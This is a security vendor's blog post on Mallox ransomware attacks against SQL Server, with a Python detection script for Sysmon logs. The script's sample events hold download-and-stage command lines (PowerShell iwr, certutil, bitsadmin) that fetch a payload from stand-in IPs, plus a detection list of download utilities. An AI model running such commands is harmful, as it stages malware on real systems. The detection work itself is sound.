Chris Swagler | August 23rd, 2023

Mallox Ransomware

The Mallox ransomware group has intensified its attacks on organizations running vulnerable Microsoft SQL Server instances. The group, also tracked as TargetCompany, Fargo, and Tohnichi, has recently released a new variant and added malware tools that improve its persistence and help it evade detection, driving its rapid rise in the threat landscape. Researchers have documented the group’s evolving tactics and urge organizations to harden their exposed SQL servers before they are targeted.

Consistency in Initial Attack Vector

While the way the Mallox ransomware group gains access to targeted networks has stayed consistent, the group keeps refining its techniques. As one cybersecurity company found, the operators exploit vulnerable SQL servers to establish a persistent foothold in the target’s network, using two well-known remote code execution (RCE) vulnerabilities, CVE-2020-0618 and CVE-2019-1068, in the initial stages of their attacks. Both are Microsoft SQL Server RCE flaws for which Microsoft shipped fixes in 2020 and 2019 respectively, so any server still exploitable through them is years behind on patching. The group has already boasted of infecting numerous organizations worldwide across sectors such as manufacturing, retail, wholesale, legal, and professional services.

A Shift in Stealth and Evasion Strategies

While the group’s initial attack vector persists, Mallox has adapted its evasion tactics for the later stages of the attack. The operators now use a variety of methods to stay hidden inside compromised networks and to obscure their activity. Researchers note that the group works by “trial and error” to secure persistence, changing the download URLs and file paths it uses until the Remcos Remote Access Trojan (RAT) is successfully retrieved and executed on the server.
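Whatever the exact SQL Server bug used for the foothold described above, the common post-exploitation tell is the database engine process (sqlservr.exe) spawning command interpreters or download utilities, and the “trial and error” retrieval of the RAT shows up as several download attempts from the same server in a short span. The following detection sketch is an added example, not SpearTip’s or the researchers’ code. It assumes Sysmon Event ID 1 (process creation) exported as JSON lines with the standard Sysmon field names, follows ProcessGuid lineage so that grandchildren of sqlservr.exe are caught too, and treats three or more distinct download URLs from one host’s SQL Server process tree as the trial-and-error pattern (that threshold is an assumption). The sample events are constructed, not captured from a real incident.

```python
"""Flag SQL Server post-exploitation from Sysmon process-creation events.

Added example, not SpearTip's or the researchers' code. Assumes Sysmon
Event ID 1 exported as JSON lines with the standard Sysmon field names;
the sample events below are constructed, not captured.
"""
import json
import re
from collections import defaultdict
from ntpath import basename  # Windows path handling, works on any OS

# Executables a database engine has no legitimate reason to spawn.
INTERPRETERS = {
    "cmd.exe", "powershell.exe", "pwsh.exe", "certutil.exe", "bitsadmin.exe",
    "mshta.exe", "wscript.exe", "cscript.exe", "rundll32.exe", "regsvr32.exe",
}
URL_RE = re.compile(r"https?://[^\s\"']+", re.IGNORECASE)
# Assumption for this example: three or more distinct download URLs from one
# host's SQL Server process tree is treated as trial-and-error retrieval.
TRIAL_THRESHOLD = 3

# Constructed sample events (JSON lines). Event 2 is a child of event 1's
# cmd.exe and is only caught by following ProcessGuid lineage; event 5 is a
# user-launched cmd.exe on a workstation and must not alert; event 6 is
# SQLDumper.exe, which sqlservr.exe legitimately spawns.
SAMPLE_EVENTS = r'''
{"Computer": "SQL01.corp.example", "ProcessGuid": "guid-cmd-1", "ParentProcessGuid": "guid-sqlservr", "ParentImage": "C:\\Program Files\\Microsoft SQL Server\\MSSQL15.MSSQLSERVER\\MSSQL\\Binn\\sqlservr.exe", "Image": "C:\\Windows\\System32\\cmd.exe", "CommandLine": "cmd.exe /c powershell -c iwr http://203.0.113.10/a/rm.txt -OutFile C:\\Users\\Public\\rm.exe"}
{"Computer": "SQL01.corp.example", "ProcessGuid": "guid-ps-1", "ParentProcessGuid": "guid-cmd-1", "ParentImage": "C:\\Windows\\System32\\cmd.exe", "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "CommandLine": "powershell -c iwr http://203.0.113.10/a/rm.txt -OutFile C:\\Users\\Public\\rm.exe"}
{"Computer": "SQL01.corp.example", "ProcessGuid": "guid-cmd-2", "ParentProcessGuid": "guid-sqlservr", "ParentImage": "C:\\Program Files\\Microsoft SQL Server\\MSSQL15.MSSQLSERVER\\MSSQL\\Binn\\sqlservr.exe", "Image": "C:\\Windows\\System32\\cmd.exe", "CommandLine": "cmd.exe /c certutil -urlcache -split -f http://203.0.113.10/b/rm.txt C:\\Users\\Public\\rm.exe"}
{"Computer": "SQL01.corp.example", "ProcessGuid": "guid-cmd-3", "ParentProcessGuid": "guid-sqlservr", "ParentImage": "C:\\Program Files\\Microsoft SQL Server\\MSSQL15.MSSQLSERVER\\MSSQL\\Binn\\sqlservr.exe", "Image": "C:\\Windows\\System32\\cmd.exe", "CommandLine": "cmd.exe /c bitsadmin /transfer x http://198.51.100.7/rm.txt C:\\Users\\Public\\rm.exe"}
{"Computer": "WS07.corp.example", "ProcessGuid": "guid-cmd-ws", "ParentProcessGuid": "guid-explorer", "ParentImage": "C:\\Windows\\explorer.exe", "Image": "C:\\Windows\\System32\\cmd.exe", "CommandLine": "cmd.exe /c curl http://203.0.113.10/a/rm.txt"}
{"Computer": "SQL01.corp.example", "ProcessGuid": "guid-dumper", "ParentProcessGuid": "guid-sqlservr", "ParentImage": "C:\\Program Files\\Microsoft SQL Server\\MSSQL15.MSSQLSERVER\\MSSQL\\Binn\\sqlservr.exe", "Image": "C:\\Program Files\\Microsoft SQL Server\\150\\Shared\\SQLDumper.exe", "CommandLine": "SQLDumper.exe 1234 0 0x0120"}
'''.strip().splitlines()


def analyze(lines):
    """Return a list of alerts for Sysmon Event ID 1 JSON lines.

    'sqlserver_spawned_interpreter' fires once per offending process;
    'repeated_payload_fetch' fires once per host whose SQL Server process
    tree tried at least TRIAL_THRESHOLD distinct download URLs.
    """
    tainted = set()             # ProcessGuids descended from sqlservr.exe
    fetches = defaultdict(set)  # host -> distinct URLs seen in that tree
    alerts = []
    for line in lines:
        ev = json.loads(line)
        parent = basename(ev["ParentImage"]).lower()
        image = basename(ev["Image"]).lower()
        if parent != "sqlservr.exe" and ev["ParentProcessGuid"] not in tainted:
            continue  # not in the SQL Server process tree
        tainted.add(ev["ProcessGuid"])
        if image in INTERPRETERS:
            alerts.append({"rule": "sqlserver_spawned_interpreter",
                           "host": ev["Computer"], "image": image,
                           "cmdline": ev["CommandLine"]})
        for url in URL_RE.findall(ev["CommandLine"]):
            fetches[ev["Computer"]].add(url)
    for host, urls in fetches.items():
        if len(urls) >= TRIAL_THRESHOLD:
            alerts.append({"rule": "repeated_payload_fetch", "host": host,
                           "urls": sorted(urls)})
    return alerts


if __name__ == "__main__":
    for alert in analyze(SAMPLE_EVENTS):
        print(json.dumps(alert))
```

Run against the sample events, the first rule fires four times (three cmd.exe children of sqlservr.exe plus the powershell.exe grandchild reached through lineage) and the second fires once for SQL01, listing the three URLs the operator cycled through; the workstation event and SQLDumper.exe produce nothing. In production the interpreter list and the threshold need tuning against the environment’s own baseline, since some maintenance jobs do launch scripts from the engine.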

Undetectable Malware Tactics

To stay below the radar of security products, the Mallox ransomware group has adopted so-called Fully Undetectable (FUD) packers, which re-encode the ransomware binary so its on-disk form matches no existing signature, raising the odds that it reaches execution. The automated scrambling these packers perform is reminiscent of the BatCloak obfuscator. In the later stages of an attack the group also uses Metasploit to load the FUD-packed Mallox payload. Neither FUD packers nor Metasploit is new, but their adoption underscores the group’s willingness to keep changing tooling to get around existing controls. The caveat for defenders is that a packer hides only the file: the unpacked payload still has to run, and its behaviour (encrypting files, dropping ransom notes) is unchanged, which is why the behaviour-based monitoring recommended below matters more than signatures here.

Defending Against Mallox Ransomware

Experts note that most Mallox victims still run SQL servers exposed to the exploits described above. To defend against this growing threat, security teams should run thorough vulnerability assessments, patch the gaps they find (starting with the two CVEs above), and reduce the attack surface of every exposed server.

Recognizing that traditional security solutions may fall short against FUD packers, the researchers recommend adopting AI- and machine learning-based file-checking and behavior-monitoring solutions. Such technologies can proactively identify and neutralize sophisticated threats.

A multi-layered defense is crucial to limiting the impact of a ransomware attack. Network-level blocking, ransomware detection, and blocking controls should be layered so that a failure of one does not lead straight to encryption. Organizations should also train staff to recognize and report intrusion attempts and other suspicious activity so that unauthorized access is caught early.

The Mallox ransomware group’s latest campaign marks a considerable escalation in targeted attacks against organizations globally. With its revamped malware variants and improved evasion tactics, the group poses a severe threat to vulnerable SQL servers and the businesses that depend on them. Organizations must stay vigilant, implement robust security measures, and use current detection technology to defend against the evolving threats posed by Mallox and groups like it.

At SpearTip, we analyze the configurations and interactions of your network infrastructure with the expertise of a skilled penetration tester. SpearTip discovers vulnerabilities in firewall systems and enables you to dedicate your resources to evaluate and prioritize fixes. This will provide visibility of actual network gaps, including existing false negatives. SpearTip provides clear remediation steps to ensure a strengthened security posture for all uncovered weaknesses. SpearTip offers two types of tabletop exercises: Executive and Technical. Executive tabletop exercises are custom designed to enhance the collaboration among business leaders and promote a common understanding of how leadership teams respond to an incident.

If your company is experiencing a breach, call our Security Operations Centers at 833.997.7327 to speak directly with an engineer.
